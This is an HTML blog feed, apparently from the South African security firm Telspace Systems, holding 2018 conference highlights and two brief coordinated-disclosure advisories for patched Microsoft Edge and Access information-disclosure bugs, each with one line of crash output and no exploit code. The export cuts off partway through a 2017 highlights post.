<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVgXcKfz1T897V6eFuK9PuppJyoFgBudRs_f0evM45aWl-fwBr0CuYg-8Tj87pCe7npJfrlWp7equp76zp72Yg_t_tkzZD9TOZoADQJv8X6hC3Bj1Bdig5wHVCYLE8RR25xgvJdtXoscJh/s1600/Dd4haihVwAcB7La.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVgXcKfz1T897V6eFuK9PuppJyoFgBudRs_f0evM45aWl-fwBr0CuYg-8Tj87pCe7npJfrlWp7equp76zp72Yg_t_tkzZD9TOZoADQJv8X6hC3Bj1Bdig5wHVCYLE8RR25xgvJdtXoscJh/s1600/Dd4haihVwAcB7La.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Manny Corregedor(Telspace Systems) giving a talk on ‘Information Security Cakes’ at the ITWeb Security Summit 2018</span></td></tr>
</tbody></table>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<br />
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz1tAa1mLYanGMYmsAQhCqI4HHdOx1eQHrXLd27FC6XRhkvQS0OLBYRU4ObjiriHYy7VnfS_ODwFi7NY4yenGNzQ7regqcewvdmdNKvmafaJ8757Ib9KSDM6qoXnk9cF2Pw7A_Ox8rqn9x/s1600/DOD.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="711" data-original-width="1050" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz1tAa1mLYanGMYmsAQhCqI4HHdOx1eQHrXLd27FC6XRhkvQS0OLBYRU4ObjiriHYy7VnfS_ODwFi7NY4yenGNzQ7regqcewvdmdNKvmafaJ8757Ib9KSDM6qoXnk9cF2Pw7A_Ox8rqn9x/s1600/DOD.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Telspace Systems Stand at the Department of Defence Supplier Day 2018</span></td></tr>
</tbody></table>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-size: 14pt;"><br /></span></div>
<h1 style="font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; line-height: 21.4667px; margin: 12pt 0in 6pt;">
</h1>
<h2 style="line-height: 32.2px; margin-bottom: 0.35cm;">
Going abroad!</h2>
<h1 style="color: black; font-style: normal; font-weight: normal; letter-spacing: normal; line-height: 21.4667px; margin: 12pt 0in 6pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">Throughout the
year we also participated in international
conferences, round table events and provided comments on news stories
in the media.</span></div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">In addition to
supporting local events, we also attended Blackhat, Defcon 26 and
BSides in Las Vegas.
</span></div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">Our CEO Dino
Covotsos also gave talks at:</span><br />
<ul>
<li><span style="font-family: inherit; font-size: large;">Defcon 26
2018 – Recon Village (Las Vegas, USA)</span></li>
<li><span style="font-family: inherit; font-size: large;">Hack In
The Box 2018 (Dubai)</span></li>
<li><span style="font-family: inherit; font-size: large;">Hackers to
Hackers 2018, H2HC (Sao Paulo, Brazil)</span></li>
</ul>
</div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<style type="text/css">
@page { margin: 2cm }
p { margin-bottom: 0.25cm; direction: ltr; line-height: 120%; text-align: left; orphans: 2; widows: 2 }
a:link { color: #0000ff }
</style>
</div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">Dino was also
listed as one of the security researchers that was thanked by the
Microsoft Security Response Center (MSRC) in recognition of making
Microsoft online services safer by finding and reporting security
vulnerabilities. More information at:
<a href="https://www.microsoft.com/en-us/msrc/researcher-acknowledgments-online-services-archive">https://www.microsoft.com/en-us/msrc/researcher-acknowledgments-online-services-archive</a></span></div>
<div style="font-family: "liberation sans", serif; line-height: 115%; margin-bottom: 0.35cm;">
<div style="font-size: 14pt;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 14pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho7UcGKERJRox4T-HidXQ6JEjGURIuJybU-fR1OYAEhCh3yxUIQWi8K7OACwlqEd2BWo9qW4AOAky3M3uH2VUJ5y4IP1OFS5qAnJJZNTAgQiQyzb0MRR_Meic5zT105eCPjvBQknq2CrnB/s1600/Dp-pwZOUwAAXR-0.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho7UcGKERJRox4T-HidXQ6JEjGURIuJybU-fR1OYAEhCh3yxUIQWi8K7OACwlqEd2BWo9qW4AOAky3M3uH2VUJ5y4IP1OFS5qAnJJZNTAgQiQyzb0MRR_Meic5zT105eCPjvBQknq2CrnB/s1600/Dp-pwZOUwAAXR-0.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Dino Covotsos giving a talk on Hacking the RFQ Process at Hackers to Hackers (Brazil)</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI1YZqe0YNQqH5tMepgI-682qQ5-NBnp5jIhn1JmQloTETK8EbLbYhTtnWPqRBzhVqVyphCbEwCCC9ikoh6g8vjTXjEb8aSCq_sD-iknE4SDgbWuQZUCsQSx6SnGwq-NRWzXDVWPpUOR4jEMi05a-MvSNUM2h68hlK8P5rLAhFfxU9FuPHb5IPuEjGUA/s720/H2H.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="720" data-original-width="598" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI1YZqe0YNQqH5tMepgI-682qQ5-NBnp5jIhn1JmQloTETK8EbLbYhTtnWPqRBzhVqVyphCbEwCCC9ikoh6g8vjTXjEb8aSCq_sD-iknE4SDgbWuQZUCsQSx6SnGwq-NRWzXDVWPpUOR4jEMi05a-MvSNUM2h68hlK8P5rLAhFfxU9FuPHb5IPuEjGUA/s16000/H2H.jpg" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Left to right: Dino Covotsos (Telspace Systems), Rodrigo Branco (Intel)<br /></td></tr></tbody></table><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 14pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivfMRVZBlEJlh6kgjHPiUHi2XwU7BU6a3vXO9HzWeRXDmjB-gek_JQAz7WYjGhA-r78xxNLSANLxN5QFmpx9u41AXQaSHLbz5izddA0YOX1orrckIuPMR2tFP881nSIAe6odI5uULsRn9o/s1600/H2H.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1080" data-original-width="1080" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivfMRVZBlEJlh6kgjHPiUHi2XwU7BU6a3vXO9HzWeRXDmjB-gek_JQAz7WYjGhA-r78xxNLSANLxN5QFmpx9u41AXQaSHLbz5izddA0YOX1orrckIuPMR2tFP881nSIAe6odI5uULsRn9o/s1600/H2H.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">SACICON 2018 Badges<br /><br /></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 14pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu3rXBBMtisrW5prm2Yo53XeKdn2ogRuRuMPQXGGsoRVvNJ4bxHQW0rI2-WNN-3wTdrBWFrbA9yjgnV8aFAPPRMLM25Ob9NZQTDqcTXRdNiTxpQAY0TfTl-6GSuzHeQDlKVkhIWVO3wRT7/s1600/Defcon.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1080" data-original-width="1080" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu3rXBBMtisrW5prm2Yo53XeKdn2ogRuRuMPQXGGsoRVvNJ4bxHQW0rI2-WNN-3wTdrBWFrbA9yjgnV8aFAPPRMLM25Ob9NZQTDqcTXRdNiTxpQAY0TfTl-6GSuzHeQDlKVkhIWVO3wRT7/s1600/Defcon.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Left to right: Jayson Street, Nina Alli and Dino Covotsos at SACICON (Brazil)</span></td></tr>
</tbody></table>
</div><div class="separator" style="clear: both; text-align: center;"><br /></div>
</h1>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhC9qmGw4p3kxJNeBZcA_7ybrAB4zPEpd6VGeY1oMutDKWk3QHYpJrDWri6KOJHJ4GxxkEaOi4kEebJ2sCw1d5ysiKIu_jPBjlzeOIBk8Sm9pwieTbPwXleyC2glc840XMjlS_N0gBIwp5/s1600/HITB.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhC9qmGw4p3kxJNeBZcA_7ybrAB4zPEpd6VGeY1oMutDKWk3QHYpJrDWri6KOJHJ4GxxkEaOi4kEebJ2sCw1d5ysiKIu_jPBjlzeOIBk8Sm9pwieTbPwXleyC2glc840XMjlS_N0gBIwp5/s1600/HITB.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Hack In The Box 2018 (Dubai)</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLatbTD_v1JLOgRv19CfihC8_eeuW_8ITX6_oSUo2RqT78M7BU2kSd5E-HhfLyeyolLmumqlTqhP0FRkN6_pK11hsXpBaZZ-iBbiq8TKIhcEfNjvn__1XkyRm4Ljo2J4gY51ratiRfB5xQ/s1600/HITB.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1080" data-original-width="1080" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLatbTD_v1JLOgRv19CfihC8_eeuW_8ITX6_oSUo2RqT78M7BU2kSd5E-HhfLyeyolLmumqlTqhP0FRkN6_pK11hsXpBaZZ-iBbiq8TKIhcEfNjvn__1XkyRm4Ljo2J4gY51ratiRfB5xQ/s1600/HITB.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Dino Covotsos giving a talk on Hacking the RFQ Process at Hack In The Box 2018 (Dubai)</span></td></tr>
</tbody></table>
<br />
<h2>
Thank you!</h2>
<br />
<span style="font-family: inherit; font-size: large;">We would like to thank everyone who made our 2018 year so amazing, a huge thank you to our staff, clients, employees, friends and most importantly the local Information Security community. We wish you all the best and a prosperous year for 2019.</span><br />
<style type="text/css">
@page { margin: 2cm }
p { margin-bottom: 0.25cm; direction: ltr; line-height: 120%; text-align: left; orphans: 2; widows: 2 }
a:link { color: #0000ff }
</style>Unknownnoreply@blogger.com057 6th Rd, Hyde Park, Johannesburg, 2196, South Africa-26.122977 28.034943-51.645011499999995 -13.273651000000001 -0.6009424999999986 69.343537tag:blogger.com,1999:blog-2540168616552398462.post-38138043256402357912018-03-07T13:05:00.000+02:002018-03-07T13:05:42.773+02:00Telspace Systems Security Advisory (TSA-2018-002)<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYiGmr0w1YPeJlzL2hKDqoFq8xpmo-v2hUXmR28OaxmOdYutlz6XDbii7of5Dz43Nt6LNogaCN7-NR0MjI3i2dZVrEUSShE6hj_zh-qDiiDtUkc7ZVzCqCYA_Eo5lAbTnSFpcXKVQN0XKy/s1600/Telspace.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="467" data-original-width="761" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYiGmr0w1YPeJlzL2hKDqoFq8xpmo-v2hUXmR28OaxmOdYutlz6XDbii7of5Dz43Nt6LNogaCN7-NR0MjI3i2dZVrEUSShE6hj_zh-qDiiDtUkc7ZVzCqCYA_Eo5lAbTnSFpcXKVQN0XKy/s320/Telspace.jpg" width="320" /></a></div>
<h2 style="text-align: center;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Security Advisory</span></b></h2>
</div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<div style="text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>TSA-2018-002: </b>Microsoft Edge Information Disclosure Vulnerability</span></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">CVE Number: </span></b><span style="background-color: transparent; font-family: "arial" , "helvetica" , sans-serif;">CVE-2018-0839</span><br />
<br /></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Summary</span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.</span><br />
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="western" style="background-color: white; line-height: 0.42cm; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b>Details and crash information</b></span><br />
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">edgehtml!Ordinal125+0xe3c86:</span><br />
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">5ef196d6 8b5928 mov ebx,dword ptr [ecx+28h] ds:0023:117cd008=????????</span></div>
<div class="western" style="background-color: white; line-height: 0.42cm; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<br /></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Vendor: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">Microsoft</span></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Product: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">Edge</span></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Version: </span></b><span style="background-color: #fffbf7; font-family: "arial" , "helvetica" , sans-serif;">11.0.15063.67</span></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Vendor URLs:</span></b></div>
<ul>
<li><span style="background-color: white; color: blue; display: inline; font-family: "arial" , "helvetica" , sans-serif; outline: none; text-align: justify; transition: 0.3s;"><a href="https://www.microsoft.com/">https://www.microsoft.com</a></span></li>
<li><span style="background-color: white; color: blue; display: inline; font-family: "arial" , "helvetica" , sans-serif; outline: none; text-align: justify; transition: 0.3s;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0839">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0839</a></span></li>
<li><span style="color: blue; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://www.zerodayinitiative.com/advisories/ZDI-18-167/">https://www.zerodayinitiative.com/advisories/ZDI-18-167/</a></span></li>
</ul>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<pre style="border-collapse: collapse; border-spacing: 0px; border: 0px; overflow-wrap: break-word; padding: 0px; word-wrap: break-word;"></pre>
</div>
</div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Vendor Response</span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; text-align: justify;">The vendor has patched the vulnerability and released a new version</span><br />
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Disclosure Timeline</span></b></div>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">23-11-2017 – Initial Discovery</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">29-11-2017 – ZDI Notification</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">07-12-2017 - Vendor notification</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">21-02-2018 - Coordinated public release of advisory</span></li>
</ul>
<div>
<b style="background-color: white; text-align: justify;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Credit</span></b></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; text-align: justify;">This vulnerability was discovered by Dmitri Kaslov of Telspace Systems</span>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-40495665757401324212018-02-28T11:30:00.000+02:002018-02-28T11:30:36.458+02:00Telspace Systems Security Advisory (TSA-2018-001)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoArf3zp44IvVhTABqzSqd-Hyiy8jE06LErpSB2BKnlc321lc-nu94a2by0uMhjNL87Dk-Vnno2j5suO2CVkdIzaO9RBAN0N52pjgHZ8qdfcxLIisgbv40LFJzAspyu71FJLxpLFoil2Bd/s1600/Telspace.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" data-original-height="467" data-original-width="761" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoArf3zp44IvVhTABqzSqd-Hyiy8jE06LErpSB2BKnlc321lc-nu94a2by0uMhjNL87Dk-Vnno2j5suO2CVkdIzaO9RBAN0N52pjgHZ8qdfcxLIisgbv40LFJzAspyu71FJLxpLFoil2Bd/s320/Telspace.jpg" width="320" /></span></a></div>
<div class="article-content entry-content" itemprop="articleBody" style="clear: both; line-height: 1.4; margin: 10px auto 5px; outline: none; padding: 0px; text-align: justify;">
<div class="article-content entry-content" itemprop="articleBody" style="clear: both; line-height: 1.4; margin: 10px auto 5px; outline: none; padding: 0px;">
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<h2 style="text-align: center;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Security Advisory</span></b></h2>
<div style="text-align: center;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
</div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><b>TSA-2018-001: </b>Microsoft Access Information Disclosure Vulnerability</span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">CVE Number: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">CVE-2018-0853</span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Summary</span></b></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">An information disclosure vulnerability exists when Microsoft Office Access software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="western" style="line-height: 0.42cm; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b style="background-color: white;">Details and crash information</b></span><br />
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">VCRUNTIME140!memcpy+0x4e:</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">72edd1ce f3a4 rep movs byte ptr es:[edi],byte ptr [esi]</span></span><br />
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b style="background-color: white;"><br /></b></span></div>
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Vendor: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">Microsoft</span><br />
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Product: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">Access</span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Version: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">16.0.8625.2127</span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Vendor URLs:</span></b></div>
<br />
<ul>
<li><a href="https://www.microsoft.com/"><span style="color: blue; font-family: "arial" , "helvetica" , sans-serif;">https://www.microsoft.com</span></a></li>
<li><a href="https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0853"><span style="color: blue; font-family: "arial" , "helvetica" , sans-serif;">https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0853</span></a></li>
</ul>
<br />
<div class="western" style="line-height: 0.42cm; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<br /></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Vendor Response</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">The vendor has patched the vulnerability and released a new version.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Disclosure Timeline</span></b></div>
<br />
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">23-11-2017 – Initial Discovery</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">25-11-2017 – Vendor Notification</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">19-01-2018 – Vendor Patch</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">13-02-2018 – Public Disclosure</span></li>
</ul>
<br />
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<br /></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Credit</span></b><br />
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">This vulnerability was discovered by Dmitri Kaslov of Telspace Systems</span></div>
</div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-67479349073058136782018-01-10T14:10:00.000+02:002018-01-10T14:10:32.559+02:002017 Highlights, a great year and even greater things to come!As we enter a new year Telspace would like to look back on 2017 and thank everyone who made 2017 one of our greatest yet. We have had the pleasure of attending a number of conferences where we were able to present, train and share ideas with like-minded individuals. 2017 saw a growth in the Telspace Team, in particular in our Research and Development space (more to come!). This blog post provides an overview of some of the highlights this year, if we have missed anything let us know in the comments below! We kicked the year off by joining up with Carte Blanche to provide comment on mobile privacy and the tools used to spy on people.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1c4mYel7R5XPgj4mQlTlgG1mCZxRaxMycS0_nrCVmj2AYjUkBCdD4uQd5x068WhCTL5PpzAiSVHs7VnG1E-Ge7C7_JRW-QF0sYZPiv98MH-aNSrLfibf2jd6H07M7Xu8sYK4LWm_c3MeC/s1600/1.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1c4mYel7R5XPgj4mQlTlgG1mCZxRaxMycS0_nrCVmj2AYjUkBCdD4uQd5x068WhCTL5PpzAiSVHs7VnG1E-Ge7C7_JRW-QF0sYZPiv98MH-aNSrLfibf2jd6H07M7Xu8sYK4LWm_c3MeC/s1600/1.png" /></a><br /><span style="font-size: 